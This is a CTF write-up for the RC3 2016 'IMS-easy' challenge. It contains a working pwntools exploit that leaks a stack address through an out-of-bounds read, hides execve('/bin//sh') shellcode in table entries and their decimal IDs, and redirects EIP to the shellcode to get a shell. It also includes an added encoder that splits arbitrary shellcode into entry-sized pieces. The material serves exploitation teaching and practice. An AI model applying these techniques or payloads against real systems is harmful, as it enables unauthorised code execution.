2016. 11. 25. 00:51
## RC3 CTF_2016(IMS-easy,pwn,150pts)
[Summary]
1. OOB read: viewing an entry index past the end of the table (entry 7 when only 6 exist) leaks a stack address
2. Shellcode stored across the entries (8-byte code field plus the 4-byte ID, passed as its decimal value), then EIP redirected to it via a final crafted ID
[Exploit Code]
```python
from pwn import *
import base64  # only used by the commented-out payload at the end

context(arch='i386', os='linux')
local = False

if local:
    p = process("./IMS-easy")
    libc = ELF("/lib/x86_64-linux-gnu/libc-2.19.so")
else:
    p = remote("ims.ctf.rc3.club", 7777)

binary = ELF("./IMS-easy")
input()  # pause here to attach a debugger before the first interaction


def send_add(id_param, code_param):
    """Menu option 1: add an entry with a decimal ID and an 8-byte code."""
    print(p.recvuntil(b'Choose: '))
    p.send(b'1\n')
    print(p.recvuntil(b'ID: '))
    p.send(id_param.encode() + b'\n')
    print(p.recvuntil(b'code: '))
    p.send(code_param + b'\n')


# Each entry is laid out as 8 code bytes followed by the 4-byte ID, so one
# 12-byte slot holds shellcode if the ID bytes are passed as their decimal
# little-endian value: 2425393296 == 0x90909090, a dword of NOPs.
send_add('2425393296', b'\x90' * 8)
#send_add('1768042344', b'\x31\xc0\x50\x68' + b'\x2f\x2f\x73\x68')
#send_add('2424360203', b'\x6e\x89\xe3\x50' + b'\x53\x89\xe1\xb0')
# execve("/bin//sh") split over two entries:
#   entry 1: push 0xb; pop eax; xor esi,esi; push esi; push "//sh"
#            (ID 1751675695 == 0x6868732f carries "/sh" and the next push opcode)
#   entry 2: "/bin"; mov ebx,esp; xor ecx,ecx
#            (ID 2160970377 == 0x80cdca89 is mov edx,ecx; int 0x80)
send_add('1751675695', b'\x6a\x0b\x58\x31' + b'\xf6\x56\x68\x2f')
send_add('2160970377', b'\x2f\x62\x69\x6e' + b'\x89\xe3\x31\xc9')

# three more NOP entries after the shellcode
for i in range(3):
    send_add('2425393296', b'\x90' * 8)

# Menu option 3: view entry 7. Only six entries exist, so the read is out of
# bounds and returns a stack value, printed as a signed 32-bit integer.
print(p.recvuntil(b'Choose: '))
p.send(b'3\n')
print(p.recvuntil(b'view: '))
p.send(b'7\n')
stack_leak = p.recvline()
print(stack_leak)
stack_leak = stack_leak[12:stack_leak.find(b',')]
stack_addr = int(stack_leak) & 0xffffffff  # signed 32-bit -> unsigned address
print('stack_addr : ' + hex(stack_addr))
print('stack_addr(dec) : ' + str(stack_addr))

# One more entry whose ID is the leaked stack address minus a fixed offset:
# this is the value that ends up in EIP, pointing into the NOP entries.
print(p.recvuntil(b'Choose: '))
p.send(b'1\n')
print(p.recvuntil(b'ID: '))
p.send(str(stack_addr - 220).encode() + b'\n')  # EIP control to shellcode!
print(p.recvuntil(b'code: '))
p.send(b'AAAAAAAA\n')

# Menu option 4 triggers the hijacked control flow; the shell is then interactive.
print(p.recvuntil(b'Choose: '))
p.send(b'4\n')

p.interactive()

'''
print('[*] Sending Payload...')
payload = base64.b64encode(b'0000\x78\x92\x04\x08\x40\xeb\x11\x08') + b'\n'
p.send(payload)
print(p.recv(1024))
print("[*] Exploit Success~~!!!\n\n")
p.interactive()
'''
```
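The magic decimal IDs in the exploit are just the four shellcode bytes that fall into each entry's ID slot, read as a little-endian uint32. The following is an added example, not code from the original writeup: it generalises that trick into a small encoder that splits arbitrary shellcode into (code, ID) pairs, pads the tail with NOPs, rebuilds the bytes to prove the encoding is lossless, and folds the signed leak back into an address. It assumes the 12-byte entry layout (8 code bytes followed by the 4-byte ID) that the exploit's byte placement implies, and that the code field is read as a newline-terminated line, as the exploit's `\n`-terminated sends suggest; the `-12096` leak value at the bottom is a constructed sample, not output from the challenge.

```python
import struct

# Entry layout inferred from the exploit above: 8 raw code bytes followed by the
# 4-byte ID, stored back to back so consecutive entries form one buffer with a
# 12-byte stride. (Assumption for this example, not a fact from the binary.)
CODE_LEN = 8
ID_LEN = 4
ENTRY_LEN = CODE_LEN + ID_LEN
NOP = b"\x90"

# execve("/bin//sh") shellcode, byte for byte what the writeup spreads over two entries.
SHELLCODE = bytes.fromhex(
    "6a0b58"       # push 0xb ; pop eax          (eax = SYS_execve)
    "31f656"       # xor esi,esi ; push esi      (NUL terminator for the path)
    "682f2f7368"   # push 0x68732f2f             ("//sh")
    "682f62696e"   # push 0x6e69622f             ("/bin")
    "89e3"         # mov ebx,esp                 (ebx -> "/bin//sh")
    "31c9"         # xor ecx,ecx                 (argv = NULL)
    "89ca"         # mov edx,ecx                 (envp = NULL)
    "cd80"         # int 0x80
)


def id_from_bytes(b):
    """Encode the 4 bytes that should land in the ID slot as the decimal string the menu accepts."""
    return str(struct.unpack("<I", b)[0])   # little-endian uint32, e.g. 90909090 -> 2425393296


def bytes_from_id(id_str):
    """Inverse: the 4 bytes a decimal ID occupies in memory on i386."""
    return struct.pack("<I", int(id_str) & 0xFFFFFFFF)


def bad_bytes(code):
    """Offsets of bytes that would cut a newline-terminated 'code' line short.
    Assumes the code field is read up to '\\n', as the exploit's sends suggest."""
    return [i for i, c in enumerate(code) if c == 0x0A]


def split_into_entries(shellcode):
    """Split arbitrary shellcode into (code, id) pairs for consecutive entries.
    The tail is NOP-padded to a whole entry; every code field is checked for newlines."""
    padded = shellcode + NOP * ((-len(shellcode)) % ENTRY_LEN)
    entries = []
    for off in range(0, len(padded), ENTRY_LEN):
        code = padded[off:off + CODE_LEN]
        if bad_bytes(code):
            raise ValueError("newline in code field of entry %d" % (off // ENTRY_LEN))
        entries.append((code, id_from_bytes(padded[off + CODE_LEN:off + ENTRY_LEN])))
    return entries


def reassemble(entries):
    """Lay the entries back out as contiguous memory to confirm the encoding is lossless."""
    return b"".join(code + bytes_from_id(id_str) for code, id_str in entries)


def leak_to_addr(signed_leak):
    """The viewer prints the leaked ID as a signed 32-bit int; fold it back into an address."""
    return int(signed_leak) & 0xFFFFFFFF


if __name__ == "__main__":
    for code, id_str in split_into_entries(SHELLCODE):
        print("code=%s  ID=%s (0x%08x)" % (code.hex(), id_str, int(id_str)))
    print("NOP dword as ID:", id_from_bytes(NOP * 4))
    print("constructed leak -12096 ->", hex(leak_to_addr(-12096)))
```

Running it reproduces the two IDs used in the exploit (1751675695 and 2160970377) from the raw shellcode, which is the quickest way to sanity-check a new payload before sending it: if `reassemble` does not round-trip, or `bad_bytes` flags an offset, the bytes would not survive the menu's input path.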